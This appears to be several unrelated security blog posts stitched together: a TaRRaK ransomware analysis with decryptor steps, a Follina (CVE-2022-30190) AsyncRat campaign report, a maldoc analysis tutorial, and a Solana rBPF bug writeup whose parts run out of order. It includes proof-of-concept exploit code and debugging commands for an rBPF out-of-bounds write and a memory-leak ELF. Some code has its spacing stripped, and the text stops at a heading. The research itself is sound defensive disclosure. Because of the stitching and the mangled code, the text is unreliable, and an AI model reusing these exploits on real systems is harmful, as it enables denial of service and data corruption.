The TaRRaK ransomware appeared in June of 2021. This ransomware contains many coding errors, so we decided to publish a small blog about them. Samples of this ransomware were spotted in our user base, so we also created a decryptor for this ransomware.
The ransomware is written in .NET. The binary is very clean and contains no protections or obfuscations. When executed, the sample creates a mutex named TaRRaK in order to ensure that only one instance of the malware is executed. Also, an auto-start registry entry is created in order to execute the ransomware on every user login:
The ransomware contains a list of 178 file types (extensions) that, when found, are encrypted:
3ds 7z 7zip acc accdb ai aif apk asc asm asf asp aspx avi backup bak bat bin bmp c cdr cer cfg cmd cpp crt crw cs csproj css csv cue db db3 dbf dcr dds der dmg dng doc docm docx dotx dwg dxf dxg eps epub erf flac flv gif gpg h html ico img iso java jpe jpeg jpg js json kdc key kml kmz litesql log lua m3u m4a m4u m4v max mdb mdf mef mid mkv mov mp3 mp4 mpa mpeg mpg mrw nef nrw obj odb odc odm odp ods odt orf p12 p7b p7c part pdb pdd pdf pef pem pfx php plist png ppt pptm pptx ps ps1 psd pst ptx pub pri py pyc r3d raf rar raw rb rm rtf rwl sav sh sln suo sql sqlite sqlite3 sqlitedb sr2 srf srt srw svg swf tga thm tif tiff tmp torrent txt vbs vcf vlf vmx vmdk vdi vob wav wma wmi wmv wpd wps x3f xlk xlm xls xlsb xlsm xlsx xml zip
The ransomware avoids folders containing one the following strings:
All Users\Microsoft\
$Recycle.Bin
:\Windows
\Program Files
Temporary Internet Files
\Local\Microsoft\
:\ProgramData\
Encrypted files are given a new extension .TaRRaK. They also contain the TaRRaK signature at the beginning of the encrypted file:
File Encryption
Implementation of the encryption is a nice example of a buggy code:
First, the ransomware attempts to read the entire file to memory using File.ReadAllBytes(). This function has an internal limit – a maximum of 2 GB of data can be loaded. In case the file is larger, the function throws an exception, which is then handled by the try-catch block. Unfortunately, the try-catch block only handles a permission-denied condition. So it adds an ACL entry granting full access to everyone and retries the read data operation. In case of any other error (read failure, sharing violation, out of memory, read from an offline file), the exception is raised again and the ransomware is stuck in an infinite loop.
Even if the data load operation succeeds and the file data can be fit in memory, there’s another catch. The Encrypt function converts the array of bytes to an array of 32-bit integers:
So it allocates another block of memory with the same size as the file size. It then performs an encryption operation, using a custom encryption algorithm. Encrypted Uint32 array is converted to another array of bytes and written to the file. So in addition to the memory allocation for the original file data, two extra blocks are allocated. If any of the memory allocations fails, it throws an exception and the ransomware is again stuck in an infinite loop.
In the rare case when the encryption process finishes (no sharing violation or another error), the ransom note file named Encrypted Files by TaRRaK.txt is dropped to the root folder of each drive:
Files with the .TaRRaK extension are associated with their own icon:
Finally, desktop wallpaper is set to the following bitmap:
How to use the Avast decryptor to decrypt files encrypted by TaRRaK Ransomware
To decrypt your files, follow these steps:
You must be logged to the same user account like the one under which the files were encrypted.
Download the free Avast decryptor for 32-bit or 64-bit Windows.
Run the executable file. It starts in the form of a wizard, which leads you through the configuration of the decryption process.
On the initial page, you can read the license information, if you want, but you really only need to click “Next”
On the next page, select the list of locations you want to be searched and decrypted. By default, it contains a list of all local drives:
On the final page, you can opt-in to backup encrypted files. These backups may help if anything goes wrong during the decryption process. This option is turned on by default, which we recommend. After clicking “Decrypt”, the decryption process begins. Let the decryptor work and wait until it finishes decrypting all of your files.
Our threat hunters have been busy searching for abuse of the recently-released zero-day remote code execution bug in Microsoft Office (CVE-2022-30190). As part of their investigations, they found evidence of a threat actor hosting malicious payloads on what appears to be an Australian VOIP telecommunications provider with a presence in the South Pacific nation of Palau.
Further analysis indicated that targets in Palau were sent malicious documents that, when opened, exploited this vulnerability, causing victim computers to contact the provider’s website, download and execute the malware, and subsequently become infected.
Key Observations
This threat was a complex multi-stage operation utilizing LOLBAS (Living off the Land Binaries And Scripts), which allowed the attacker to initialize the attack using the CVE-2022-30190 vulnerability within the Microsoft Support Diagnostic Tool. This vulnerability enables threat actors to run malicious code without the user downloading an executable to their machine which might be detected by endpoint detection.
Multiple stages of this malware were signed with a legitimate company certificate to add additional legitimacy and minimize the chance of detection.
First stage
The compromised website, as pictured in the screenshot below, was used to host robots.txt which is an executable which was disguised as “robots.txt”. We believe the name was used to conceal itself from detection if found in network logs. Using the Diagnostics Troubleshooting Wizard (msdt.exe), this file “robots.txt” was downloaded and saved as the file (Sihost.exe) and then executed.
Second Stage, Sihost.exe
When the renamed “robots.txt” – “Sihost.exe” – was executed by msdt.exe it downloaded the second stage of the attack which was a loader with the hash b63fbf80351b3480c62a6a5158334ec8e91fecd057f6c19e4b4dd3febaa9d447. This executable was then used to download and decrypt the third stage of the attack, an encrypted file stored as ‘favicon.svg’ on the same web server.
Third stage, favicon.svg
After this file has been decrypted, it is used to download the fourth stage of the attack from palau.voipstelecom.com[.]au. These files are named Sevntx64.exe and Sevntx.lnk, which are then executed on the victims’ machine.
Fourth Stage, Sevntx64.exe and Sevntx64.lnk
When the file is executed, it loads a 66kb shellcode from the AsyncRat malware family; Sevntx64.exe is signed with the same compromised certificate as seen previously in “robots.txt”.
The screenshot below shows the executable loading the shellcode.
Final Stage, AsyncRat
When the executable is loaded, the machine has been fully compromised with AsyncRat; the trojan is configured to communicate with the server palau[.]voipstelecom[.]com[.]au on port 443.
We highly recommend Avast Software to protect against the latest threats, and Microsoft patches to protect your Windows systems from the latest CVE-2022-30190 vulnerability.
I returned to write the second article of Malware Analysis Series (MAS) last January/08 after receiving an outstanding support from a high-profile professional and company of the industry, but while the article is not ready (I working on page 43 and far from the end), I spent a couple of hours writing a simple and short article on malicious document analysis. I hope it helps someone.
While the first article of MAS (Malware Analysis Series) is not ready, I’m leaving here a very simple case of malicious document analysis for helping my Twitter followers and any professional interested in learning how to analyze this kind of artifact.
Before starting the analysis, I’m going to use the following environment and tools:
All three tools above are usually installed on REMnux by default. However, if you are using Ubuntu or any other Linux distribution, so you can install them through links and command above.
Like any common binary, we can analyze any maldoc using static or dynamic analysis, but as my preferred approach is always the former one, so let’s take it.
We’ll be analyzing the following sample: 59ed41388826fed419cc3b18d28707491a4fa51309935c4fa016e53c6f2f94bc
Downloading sample and gathering information
The first step is getting general information about this hash by using any well-known endpoint such as Virus Total, Hybrid Analysis, Triage, Malware Bazaar and so on. Therefore, let’s use Malwoverview to do it on the command line and collect information from Malware Bazaar that, fortunately, also brings information from excellent Triage:
Given the output above, we could try to make an assumption that the dropped executable comes from the own maldoc because Microsoft Office “loads VBA resource, possible macro or embedded object present“. Furthermore, the maldoc seems to elevate privilege (AdjustPrivilege( )), hook (intercept events) by installing a hook procedure into a hook chain (SetWindowsHookEx( )), maybe it makes code injection (WriteProcessMemory( )), so we it’s reasonable to assume these Triage signatures are associate to the an embedded executable. Therefore it’s time to download the malicious document from Triage (you can do it from https://tria.ge/dashboard website, if you wish):
From both previous outputs, important facts come up:
Some code is executed when the MS Word is executed.
A file seems to be written to the file system.
The maldoc seems to open a file (probably the same written above).
VBA macros are responsible for the entire activity.
The next step is to analyze the maldoc, which is a OLE document, we are going use oledump.py (from Didier Steven’s suite — @DidierStevens) to check the OLE’s internals and try to understand what’s happening:
According to the figure above we have:
three macros in 16, 17 and 18.
a big “content” in 11, which could be one of “VBA resources” mentioned Triage’s output.
Once again, we can decide to use dynamic analysis (a debugger) or static analysis to expose the real threat hidden inside this malicious document, but let’s proceed with static analysis because it will bring more details while addressing the problem.
In the next step we need to check the macros’ content by uncompressing their contents (-v option) using oledump.py:
remnux@remnux:~/articles$ oledump.py -s 16 -v 59ed41388826fed419cc3b18d28707491a4fa51309935c4fa016e53c6f2f94bc.docx | more
There’re few details that can be observed from output above:
Obviously the code is obfuscated.
The Split function, which returns a zero-based and one-dimensional array containing substrings, manipulates the content from UserForm1 (object 11) and, apparently, this content is divided in four parts (TextBox1, TextBox2, TextBox3 and TextBox4). In addition, the UserForm1 content seems to be separated by “!” character.
The UserForm2 is also being (TextBox1 and TextBox2) in a MoveFile operation.
The Winmgmt service, which is a WMI service operating inside the svchost process under LocalSystem account, is being used to execute an operation given by UserForm2.TextBox5.
The UserForm2.Text6 is used to create a reference to an object provided by ActiveX.
The UserForm2.Text7 is being used to save some content as a binary file.
Therefore we must investigate the content of object 15 (Macros/UserForm2/o):
Analyzing the image above (check SaveBinaryData() function) and previous figures, it’s reasonable to assume that an executable, which we don’t know yet, will be saved as “winword.com“ and later it will be renamed to “winword.exe“ within C:\Users\Public\Pictures\ directory. Finally, the binary will be executed by calling objProcess.create() function.
At this point, we should verify the content of object 11 (check “Macros/UserForm1/o“) because it likely contain our “hidden” executable. Thus, run the following command:
remnux@remnux:~/articles$ oledump.py 59ed41388826fed419cc3b18d28707491a4fa51309935c4fa016e53c6f2f94bc.docx -s 11 -d | more
As we expected and mentioned previously, these decimal numbers are separated by “!” character.
Additionally, there’s a catch: according to last figure, this object has 4 parts (UserForm1.Text1, UserForm1.Text2, UserForm1.Text3 and UserForm1.Text4), so we should dump it into a file (dump1), edit and “join” all parts.
To dump the “object 11” into a file (named dump1) execute the following command: :
Editing the file using “vi” command or any other editor.
Using “$” to go to the end of each line.
Removing occurrences of “Tahoma” word and any garbage (easily identified) from the text.
Join this line with the next one (“J” command on “vi“)
After editing the dump1 file, we have two replace all “!” characters by commas, and transform all decimal numbers into hex bytes. First, replace all “!” characters by comma using a simple “sed” command:
remnux@remnux:~/articles$ sed -e ‘s/!/,/g’ dump1 > dump3
remnux@remnux:~/articles$ cat dump3 | more
From this point we have to process and transform this file (dump3) to something useful end we have two clear options:
We can write a Python 3 code to statically decode the dump3 file into a possible executable.
I’m going to show you both methods, though I always prefer programming a small script. Please, pay attention to the fact that all decimal numbers are separated by comma, so it will demand an extra concern during the decoding operation.
To decode this file on CyberChef you have to:
Load it onto CyberChef’s input pane. There’s an button on top-right to do it.
Pick up “From Decimal” operation and configure the delimiter to “Comma”.
Afterwards, you’ll see an executable in the Output pane, which can be saved onto file system.
Saving the file from Output pane, save the file and check its type:
remnux@remnux:~/Downloads$ file download.dat
download.dat: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
It’s excellent! Let’s now write a simple Python code named python_convert.py to perform the same operation and get the same result:
final_file.bin: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
As we expected, it’s worked! Finally, let’s check the final binary on Virus Total and Triage to learn a bit further about the extracted binary (next figures):
It would be super easy to extract the same malware from the maldoc by using dynamic analysis. You’ll find out that a password is protecting the VBA Project, but this quite trivial to remove this kind of protection:
That’s it! I hope you have learned something new from this article and see you at next next one.
“Long is the way and hard, that out of hell leads up to light.”
(by John Milton from Paradise Lost — 1667)
My name is Alexandre Borges and I’m a security researcher focused on reverse engineering, exploit development and programming. Therefore, I’ll try to keep this blog updated and including write-up’s about these topics.
Honestly, I hope you can learn something from my posts.
Please, you should feel free to contact me and comment about any mistake and inaccuracy.
Below are the writeups for two vulnerabilities I discovered in
Solana rBPF, a self-described
“Rust virtual machine and JIT compiler for eBPF programs”. These
vulnerabilities were responsibly disclosed according to Solana’s
Security Policy
and I have permission from the engineers and from the Solana Head of
Business Development to publish these vulnerabilities as shown below.
In part 1, I discussed the
development of the fuzzers. Here, I will discuss the vulnerabilities
as I discovered them and the process of reporting them to Solana.
Bug 1: Resource exhaustion
The first bug I reported to Solana was exceptionally tricky; it only
occurs in highly specific circumstances, and the fact that the
fuzzer discovered it at all is a testament to the incredible
complexity of inputs a fuzzer can discover through repeated trials.
The relevant crash was found in approximately two hours of fuzzer
start.
Initial Investigation
The input that triggered the crash disassembles to the following
assembly:
For whatever reason, this particular set of instructions causes
a memory leak.
When executed, this program does the following steps, roughly:
increase r0 (which starts at 0) by 255
jump back to the previous instruction if r0 is less than or equal
to 8355838
this, in tandem with the first step, will cause the loop to
execute 32767 times (a total of 65534 instructions)
set r9 to r3 * 2^3, which is going to be zero because r3 starts at
zero
calls a nonexistent function
the nonexistent function should trigger an unknown symbol
error
What stood out to me about this particular test case is how
incredibly specific it was; varying the addition of 255 or 8355838 by
even a small amount caused the leak to disappear. It was then I
remembered the following line from my fuzzer:
remaining, here, refers to the number of instructions remaining
before the program is forceably terminated. As a result, the leaking
program was running out this meter at exactly the call instruction.
A faulty optimisation
There is a wall of text at line 420 of jit.rs
which suitably describes an optimisation that Solana applied in order
to reduce the frequency at which they need to update the instruction
meter.
The short version is that they only update or check the instruction
meter when they reach the end of a block or a call in order to reduce
the amount of times they update and check the meter. This optimisation
is totally reasonable; we don’t care if we run out of instructions at
the middle of a block because the subsequent instructions are still
“safe”, and if we ever hit an exit that’s the end of a block anyway.
In other words, this optimisation should have no effect on the final
state of the program.
The issue can be seen in the patch for the vulnerability,
where the maintainer moved line 1279 to line 1275. To understand why
that’s relevant, let’s walk through our execution again:
increase r0 (which starts at 0) by 255
jump back to the previous instruction if r0 is less than or equal
to 8355838
this, in tandem with the first step, will cause the loop to
execute 32767 times (a total of 65534 instructions)
our meter updates here
set r9 to r3 * 2^3, which is going to be zero because r3 starts at
zero
calls a nonexistent function
the nonexistent function should trigger an unknown symbol
error, but that doesn’t happen because our meter updates here
and emits a max instructions exceeded error
However, based on the original order of the instructions, what happens
in the call is the following:
invoke the call, which fails because the symbol is unresolved
to report the unresolved symbol, we invoke that
report_unresolved_symbol
function, which returns the name of the symbol invoked (or
“Unknown”) in a heap-allocated string
the pc is updated
the instruction count is validated, which overwrites the
unresolved symbol error and terminates execution
Because the unresolved symbol error is merely overwritten, the value
is never passed to the Rust code which invoked the JIT program. As a
result, the reference to the heap-allocated String is lost and never
dropped. Thus: any pointer to that heap allocation is lost and will
never be freed, leading to the leak.
That being said, the leak is only seven bytes per execution of the
program. Without causing a larger leak, this isn’t particularly
exploitable.
Note how the name is the string which becomes heap allocated. The
value of the name is determined by a relocation lookup in the ELF, which
we can actually control if we compile our own malicious ELF. Even though
the fuzzer only tests the JIT operations, one of the intended ways to
load a BPF program is as an ELF,
so it seems like something that would certainly be in scope.
Crafting the malicious ELF
To create an unresolved relocation in BPF, it’s actually quite simple.
We just need to create a function with a very, very long name that isn’t
actually defined, only declared. To do so, I created two files to craft
the malicious ELF:
evil.h
evil.h is far too large to post here, as it has a function name that
is approximately a mebibyte long. Instead, it was generated with the
following bash command.
Note that goto +0 is used here because we’ll use a specialised
instruction meter that only can do two instructions.
Finally, we’ll also make a Rust program to load and execute this ELF
just to make sure the maintainers are able to replicate the issue.
elf-memleak.rs
You won’t be able to use this particular example anymore as rBPF has
changed a lot of its API since the time this was created. However,
you can check out version v0.22.21,
which this exploit was crafted for.
Note in particular the use of an instruction meter with two remaining.
With our malicious ELF that has a function name that’s a mebibyte
long, the report_unresolved_symbol will set that name variable
to the long function name. As a result, the allocated string will
leak a whole mebibyte of memory per execution rather than the
measly seven bytes. When performed in this loop, the entire system’s
memory will be exhausted in mere moments.
Reporting
Okay, so now that we’ve crafted the exploit, we should probably
report it to the vendor.
A quick Google later and we find the Solana security policy.
Scrolling through, it says:
DO NOT CREATE AN ISSUE to report a security problem. Instead, please send an email to [email protected] and provide your github username so we can add you to a new draft security advisory for further discussion.
Okay, reasonable enough. Looks like they have bug bounties too!
DoS Attacks: $100,000 USD in locked SOL tokens (locked for 12 months)
Woah. I was working on rBPF out of curiosity, but it seems that
there’s quite a bounty made available here.
I sent in my bug report via email on January 31st, and, within just
three hours, Solana acknowledged the bug. Below is the report as
submitted to Solana:
Report for bug 1 as submitted to Solana
There is a resource exhaustion vulnerability in solana_rbpf (specifically in src/jit.rs) which affects JIT-compiled eBPF programs (both ELF and insn_builder programs). An adversary with the ability to load and execute eBPF programs may be able to exhaust memory resources for the program executing solana_rbpf JIT-compiled programs.
The vulnerability is introduced by the JIT compiler’s emission of an unresolved symbol error when attempting to call an unknown hash after exceeding the instruction meter limit. The rust call emitted to Executable::report_unresolved_symbol allocates a string (“Unknown”, or the relocation symbol associated with the call) using .to_string(), which performs a heap allocation. However, because the rust call completes with an instruction meter subtraction and check, the check causes the early termination of the program with Err(ExceededMaxInstructions(_, _)). As a result, the reference to the error which contains the string is lost and thus the string is never dropped, leading to a heap memory leak.
The following eBPF program demonstrates the vulnerability:
entrypoint:goto+0r0=0call-1
where the tail call’s immediate argument represents an unknown hash (this can be compiled directly, but not disassembled) and with a instruction meter set to 2 instructions remaining.
The optimisation used in jit.rs to only update the instruction meter is triggered after the ja instruction, and subsequently the mov64 instruction does not update the instruction meter despite the fact that it should prevent further execution here. The call instruction then performs a lookup for the non-existent symbol, leading to the execution of Executable::report_unresolved_symbol which performs the allocation. The call completes and updates the instruction meter again, now emitting the ExceededMaxInstructions error instead and losing the reference to the heap-allocated string.
While the leak in this example is only 7 bytes per error emitted (as the symbol string loaded is “Unknown”), one could craft an ELF with an arbitrarily sized relocation entry pointing to the call’s offset, causing a much faster exhaustion of memory resources. Such an example is attached with source code. I was able to exhaust all memory on my machine within a few seconds by simply repeatedly jit-executing this binary. A larger relocation entry could be crafted, but I think the example provided makes the vulnerability quite clear.
Attached is a Rust file (elf-memleak.rs) which may be placed within the examples/ directory of solana_rbpf in order to test the evil.{c,h,so} provided. It is highly recommend to run this for a short period of time and cancelling it quickly, as it quickly exhausts memory resources for the operating system.
Additionally, one could theoretically trigger this behaviour in programs not loaded by the attacker by sending crafted payloads which cause this meter misbehaviour. However, this is unlikely because one would also need to submit such a payload to a target which has an unresolved symbol.
For these reasons, I propose that this bug be classified under DoS Attacks (Non-RPC).
Solana classified this bug as a Denial-of-Service (Non-RPC) and
awarded $100k.
Bug 2: Persistent .rodata corruption
The second bug I reported was easy to find, but difficult to diagnose.
While the bug occurred with high frequency, it was unclear as to
what exactly what caused the bug. Past that, was it even exploitable
or useful?
Initial Investigation
The input that triggered the crash disassembles to the following
assembly:
entrypoint:or32r9,-1mov32r1,-1stxh[r9+0x1],r0exit
The crash type triggered was a difference in JIT vs interpreter exit
state; JIT terminated with Ok(0), whereas interpreter terminated
with:
Spicy stuff. Looks like our JIT implementation has some form of
out-of-bounds write. Let’s investigate a bit further.
The first thing of note is the access violation’s address:
4294967296. In other words, 0x100000000. Looking at the Solana
documentation,
we see that this address corresponds to program code. Are we
writing to JIT’d code??
The answer, dear reader, is unfortunately no. As exciting as the
prospect of arbitrary code execution might be, this actually refers
to the BPF program code – more specifically, it refers to the
read-only data present in the ELF provided. Regardless, it is
writing to a immutable reference to a Vec somewhere that represents
the program code, which is supposed to be read-only.
So why isn’t it?
The curse of x86
Let’s make our payload more clear and execute directly, then pop
it into gdb to see exactly what code the JIT compiler is
generating. I used the following program to test for OOB write:
oob-write.rs
This code likely no longer works due to changes in the API of
rBPF changing in recent releases. Try it in examples/ in v0.2.22,
where the vulnerability is still present.
usestd::collections::BTreeMap;usesolana_rbpf::{elf::Executable,insn_builder::{Arch,BpfCode,Instruction,IntoBytes,MemSize,Source,},user_error::UserError,verifier::check,vm::{Config,EbpfVm,SyscallRegistry,TestInstructionMeter},};usesolana_rbpf::elf::register_bpf_function;usesolana_rbpf::error::UserDefinedError;usesolana_rbpf::static_analysis::Analysis;usesolana_rbpf::vm::InstructionMeter;fndump_insns<E:UserDefinedError,I:InstructionMeter>(executable:&Executable<E,I>){letanalysis=Analysis::from_executable(executable);// eprint!("Using the following disassembly");analysis.disassemble(&mutstd::io::stdout()).unwrap();}fnmain(){letconfig=Config::default();letmutcode=BpfCode::default();letmutjit_mem=Vec::new();letmutbpf_functions=BTreeMap::new();register_bpf_function(&mutbpf_functions,0,"entrypoint",false).unwrap();code.load(MemSize::DoubleWord).set_dst(9).push().load(MemSize::Word).set_imm(1).push().store_x(MemSize::HalfWord).set_dst(9).set_off(0).set_src(0).push().exit().push();letmutprog=code.into_bytes();assert!(check(prog,&config).is_ok());letmutexecutable=Executable::<UserError,TestInstructionMeter>::from_text_bytes(prog,None,config,SyscallRegistry::default(),bpf_functions).unwrap();assert!(Executable::jit_compile(&mutexecutable).is_ok());dump_insns(&executable);letmutjit_vm=EbpfVm::<UserError,TestInstructionMeter>::new(&executable,&mut[],&mutjit_mem).unwrap();letmutjit_meter=TestInstructionMeter{remaining:1<<16};letjit_res=jit_vm.execute_program_jit(&mutjit_meter);ifletOk(_)=jit_res{eprintln!("{} => {:?} ({:?})",0,jit_res,&jit_mem);}}
This just sets up and executes the following BPF assembly:
entrypoint:lddwr9,0x100000000stxh[r9+0x0],r0exit
This assembly simply writes a 0 to 0x100000000.
For the next part: please, for the love of god, use GEF.
$ cargo +stable build --example oob-write
$ gdb ./target/debug/examples/oob-write
gef➤ break src/vm.rs:1061 # after the JIT'd code is prepared
gef➤ run
gef➤ print self.executable.ro_section.buf.ptr.pointer
gef➤ awatch *$1 # break if we modify the readonly section
gef➤ record full # set up for reverse execution
gef➤ continue
After that last continue, we effectively execute until we hit the
write access to our read-only section. Additionally, we can step
backwards in the program until we find our faulty behaviour.
The watched memory is written to as a result of this X86 store
instruction
(as a reminder, we this is the branch for stxh). Seeing this
emit_address_translation call above it, we can determine that
that function likely handles the address translation and readonly
checks.
Further inspection shows that emit_address_translation actually
emits a call to… something:
This creates an x86 instruction with the opcode 0x81. Inspecting
closer and cross-referencing with an x86-64 opcode reference,
you can find that opcode 0x81 is only defined for 16-, 32-, and
64-bit register operands. If you want to use an 8-bit register
operand, you’ll need to use the 0x80 opcode variant.
A quick side note about testing code with different compilers
This bug actually was a bit weirder than it seems at first. Due
to differences in Rust struct padding between versions, at the time
that I reported the bug, the difference was spurious in stable
release. As a result, it’s quite likely that no one would have
noticed the bug until the next Rust release version.
From my report:
It is likely that this bug was not discovered earlier due to inconsistent behaviour between various versions of Rust. During testing, it was found that stable release did not consistently have non-zero field padding where stable debug, nightly debug, and nightly release did.
Proof of concept
Alright, now to create a PoC so that the people inspecting the bug
can validate it. Like last time, we’ll create an ELF, along with a
few different demonstrations of the effects of the bug.
Specifically, we want to demonstrate that read-only values in the
BPF target can be modified persistently, as our writes affect the
executable and thus all future executions of the JIT program.
value_in_ro.c
This program should fail, as the data to be overwritten should be
read-only. It will be executed by howdy.rs.
This program loads the compiled version of value_in_ro.c and
attaches a log syscall so that we can see the behaviour internally.
I confirmed that this syscall did not affect the runtime
behaviour.
This program, when executed, has the following output:
howdy
evil!
evil!
evil!
evil!
evil!
evil!
evil!
These first two files demonstrate the ability to overwrite the
readonly data present in binaries persistently. Notice that we
actually execute the JIT’d code multiple times, yet our changes
to the value in data are persistent.
Implications
Suppose that there was a faulty offset or a user-controlled offset
present in a BPF-based on-chain program. A malicious user could
modify the readonly data of the program to replace certain contexts.
In the best case scenario, this might lead to DoS of the program.
In the worst case, this could lead to the replacement of fund
amounts, of wallet addresses, etc.
Reporting
Having assembled my proof-of-concepts, my implications, and so on,
I sent in the following report to Solana on February 4th:
Report for bug 2 as submitted to Solana
An incorrectly sized memory operand emitted by src/jit.rs:1490 may lead to .rodata section corruption due to an incorrect is_writable check. The cmp emitted is cmp DWORD PTR [rax+0x19], 0x0. As a result, when the uninitialised data present in the field padding of MemoryRegion is non-zero, the comparison will fail and assume that the section is writable. The data which is overwritten is persistent during the lifetime of the Executable instance as the data overwritten is in Executable.ro_section and thus affects future executions of the program without recompilation.
It is likely that this bug was not discovered earlier due to inconsistent behaviour between various versions of Rust. During testing, it was found that stable release did not consistently have non-zero field padding where stable debug, nightly debug, and nightly release did.
The first attack scenario where this vulnerability may be leveraged is in corruption of believed read-only data; see value_in_ro.{c,so} (intended to be placed within tests/elfs/) as an example of this behaviour. The example provided is contrived, but in scenarios where BPF programs do not correctly sanitise offsets in input, it may be possible for remote attackers to craft payloads which corrupt data within the .rodata section and thus replace secrets, operational data, etc. In the worst case, this may include replacement of critical data such as fixed wallet addresses for the lifetime of the Executable instance, which may be many executions. To test this behaviour, refer to howdy.rs (intended to be placed within examples/). If you find that corruption behaviour does not appear, try using a different optimisation level or compiler.
The second attack scenario is in corruption of BPF source code, which poisons future analysis and compilation. In the worst case (which is probably not a valid scenario), if the Executable is erroneously JIT compiled a second time after being executed in JIT once, the JIT compilation may emit unchecked BPF instructions as the verifier used in from_elf/from_text_bytes is not used per-compilation. Analysis and tracing is similarly corrupted, which may be leveraged to obscure or misrepresent the instructions which were previously executed. An example of the latter is provided in analysis-corruption.rs (intended to be placed within examples/). If you find that corruption behaviour does not appear, try using a different optimisation level or compiler.
While this vulnerability is largely uncategorised by the security policy provided, due to the possibility of the corruption of believed read-only data, I propose that this vulnerability be categorised under Other Attacks or Safety Violations.
Solana classified this bug as a Denial-of-Service (Non-RPC) and
awarded $100k. I disagreed strongly with this classification, but
Solana said that due to the low likelihood of the exploitation of
this bug (requiring a vulnerability in the on-chain program) they
would offer $100k instead of the originally suggested $1m or $400k.
They would not move on this point.
However, I would offer that (was that the actually basis for bug
classification) that they should update their Security Policy to
reflect that meaning. It was obviously very disappointing to hear
that they would not be offering the bounty I expected given the
classification categories provided.
Okay, so what’d you do with the money??
It would be bad form of me to not explain the incredible flexibility
shown by Solana in terms of how they handled my payout. I intended
to donate the funds to the Texas A&M Cybersecurity Club, at which
I gained a lot of the skills necessary to perform this research and
these exploits, and Solana was very willing to sidestep their listed
policy and donate the funds directly in USD rather than making me
handle the tokens on my own, which would have dramatically affected
how much I could have donated due to tax. So, despite my concerns
regarding their policy, I was very pleased with their willingness
to accommodate my wishes with the bounty payout.
By applying well-known fuzzing techniques to a popular target, I found several bugs that in total yielded over $200K in bounties. In this article I will demonstrate how powerful fuzzing can be when applied to software which has not yet faced sufficient testing.
If you’re here just for the bug disclosures, see Part 2, though I encourage
you all, even those who have not yet tried their hand at fuzzing, to read
through this.
Exposition
A few friends and I ran a little Discord server (now a Matrix space) which in
which we discussed security and vulnerability research techniques. One of the
things we have running in the server is a bot which posts every single CVE as
they come out. And, yeah, I read a lot of them.
One day, the bot posted something that caught my eye:
This marks the beginning of our timeline: January 28th. I had noticed this CVE
in particular for two reasons:
it was BPF, which I find to be an absurdly cool concept as it’s used in the
Linux kernel (a JIT compiler in the kernel!!! what!!!)
it was a JIT compiler written in Rust
This CVE showed up almost immediately after I had developed some relatively
intensive fuzzing for some of my own Rust software (specifically, a
crate for verifying sokoban solutions
where I had observed similar issues
and thought “that looks familiar”).
Knowing what I had learned from my experience fuzzing my own software and that
bugs in Rust programs could be quite easily found with the combo of cargo fuzz
and arbitrary, I thought: “hey, why
not?”.
The Target, and figuring out how to test it
Solana, as several of you likely know, “is a
decentralized blockchain built to enable scalable, user-friendly apps for the
world”. They primarily are known for their cryptocurrency, SOL, but also are
a blockchain which operates really any form of smart contract.
rBPF in particular is a self-described
“Rust virtual machine and JIT compiler for eBPF programs”. Notably, it
implements both an interpreter and a JIT compiler for BPF programs. In other
words: two different implementations of the same program, which theoretically
exhibited the same behaviour when executed.
I was lucky enough to both take a software testing course in university and to
have been part of a research group doing fuzzing (admittedly, we were fuzzing
hardware, not software, but the concepts translate). A concept that I had hung
onto in particular is the idea of test oracles
– a way to distinguish what is “correct” behaviour and what is not in a
design under test.
In particular, something that stood out to me about the presence of both an
interpreter and a JIT compiler in rBPF is that we, in effect, had a perfect
pseudo-oracle; as Wikipedia puts it:
a separately written program which can take the same input as the program or system under test so that their outputs may be compared to understand if there might be a problem to investigate.
Those of you who have more experience in fuzzing will recognise this concept
as differential fuzzing,
but I think we can often overlook that differential fuzzing is just another
face of a pseudo-oracle.
In this particular case, we can execute the interpreter, one implementation of
rBPF, and then execute the JIT compiled version, another implementation, with
the same inputs (i.e., memory state, entrypoint, code, etc.) and see if their
outputs are different. If they are, one of them must necessarily be
incorrect per the description of the rBPF crate: two implementations of
exactly the same behaviour.
Writing a fuzzer
To start off, let’s try to throw a bunch of inputs at it without
really tuning to anything in particular. This allows us to sanity check that our basic fuzzing implementation actually works as we expect.
The dumb fuzzer
First, we need to figure out how to execute the interpreter. Thankfully, there
are several examples of this readily available in a variety of tests. I
referenced the test_interpreter_and_jit macro present in
ubpf_execution.rs
as the basis for how my so-called “dumb” fuzzer
executes.
I’ve provided a sequence of components you can look at one chunk at a time
before moving onto the whole fuzzer. Just click on the dropdowns to view the
code relevant to that step. You don’t necessarily need to to understand the
point of this post.
Step 1: Defining our inputs
We must define our inputs such that it’s actually useful for our fuzzer.
Thankfully, arbitrary makes it near
trivial to derive an input from raw bytes.
If you want to see the definition of ConfigTemplate, you can check it out in
common.rs,
but all you need to know is that its purpose is to test the interpreter under
a variety of different execution configurations. It’s not particularly
important to understand the fundamental bits of the fuzzer.
Step 2: Setting up the VM
Setting up the fuzz target and the VM comes next. This will allow us to not
only execute our test, but later to actually check if the behaviour is
correct.
fuzz_target!(|data:DumbFuzzData|{letprog=data.prog;letconfig=data.template.into();ifcheck(&prog,&config).is_err(){// verify pleasereturn;}letmutmem=data.mem;letregistry=SyscallRegistry::default();letmutbpf_functions=BTreeMap::new();register_bpf_function(&config,&mutbpf_functions,®istry,0,"entrypoint").unwrap();letexecutable=Executable::<UserError,TestInstructionMeter>::from_text_bytes(&prog,None,config,SyscallRegistry::default(),bpf_functions,).unwrap();letmem_region=MemoryRegion::new_writable(&mutmem,ebpf::MM_INPUT_START);letmutvm=EbpfVm::<UserError,TestInstructionMeter>::new(&executable,&mut[],vec![mem_region]).unwrap();// TODO in step 3});
You can find the details for how fuzz_target works from the
Rust Fuzz Book
which goes over how it works in higher detail than would be appropriate here.
Step 3: Executing our input and comparing output
In this step, we just execute the VM with our provided input. In future
iterations, we’ll compare the output of interpreter vs JIT, but in this
version, we’re just executing the interpreter to see if we can induce crashes.
fuzz_target!(|data:DumbFuzzData|{// see step 2 for this bitdrop(black_box(vm.execute_program_interpreted(&mutTestInstructionMeter{remaining:1024},)));});
I use black_box here but I’m not entirely convinced that it’s necessary. I
added it to ensure that the result of the interpreted program’s execution
isn’t simply discarded and thus the execution marked unnecessary, but I’m
fairly certain it wouldn’t be regardless.
Note that we are not checking for if the execution failed here. If the BPF
program fails: we don’t care! We only care if the VM crashes for any reason.
Step 4: Put it together
